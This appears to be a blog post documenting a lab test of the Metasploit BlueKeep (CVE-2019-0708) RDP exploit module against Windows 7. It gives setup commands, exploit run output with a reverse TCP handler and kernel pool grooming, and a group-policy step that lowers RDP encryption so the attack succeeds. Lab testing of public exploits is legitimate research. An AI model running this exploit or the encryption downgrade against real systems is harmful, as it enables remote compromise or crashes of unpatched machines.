Testing Bluekeep CVE-2019–0708 Metasploit Module on Windows 7

Setting Up

UPDATE: Seems that the PullRequest was approved and merged to the project’s master branch. So it’s not necessary to set the origin to the pull/12283.

#git clone https://github.com/rapid7/metasploit-framework.git
#cd metasploit-framework/
#git fetch origin pull/12283/head:bluekeep
#git checkout bluekeep
#gem install bundler
#bundler
#apt install libpq-dev
#bundler
#apt install libpcap-dev -y
#bundler
#apt install libsqlite3-dev
#bundler
#./msfconsole

Getting a Blue Screen

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

[*] Started reverse TCP handler on 172.24.1.10:4444
[*] 172.24.1.20:3389 — Detected RDP on 172.24.1.20:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 172.24.1.20:3389 — The target is vulnerable.
[*] 172.24.1.20:3389 — Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8028600000, Channel count 1.
[*] 172.24.1.20:3389 — Surfing channels …
[*] 172.24.1.20:3389 — Lobbing eggs …
[*] 172.24.1.20:3389 — Forcing the USE of FREE’d object …
[*] Exploit completed, but no session was created.

Finding the NPP

The module is currently ranked as Manual, as the user needs to supply additional target information or risk crashing the target host. The module implements a default fingerprint-only TARGET option that just checks for a vulnerable host and displays some initial information about the specific target OS, but the user will need to specify a more exact target based on secondary recon, or until further improvements in this module enable more accurate determination of the target kernel memory layout at runtime.

Searching nonpaged pool (fffffa8002402000 : fffffa805fc00000) for tag 0x2020202a (*   )

Finally

[*] 10.2.2.2:3389 — Verifying RDP protocol…
[*] 10.2.2.2:3389 — Attempting to connect using TLS security
[*] 10.2.2.2:3389 — Send data: 0300002d28e00000000000436f6f6b69653a206d737473686173683d575056517971720d0a010008000b000000 # this was a debug I’ve put in the lib/msf/core/exploit/rdp.rb
[-] 10.2.2.2:3389 — Connection reset
[*] 10.2.2.2:3389 — Cannot reliably check exploitability.
[-] 10.2.2.2:3389 — Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override
[*] Exploit completed, but no session was created.

-gpedit.msc;
-Computer Policy > Administrative Templates > Windows Components > Remote Desktop Services > Remote Desktop Session Host, and then click on Security.
-On “Set client connection encryption level”, set to Low Level;

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store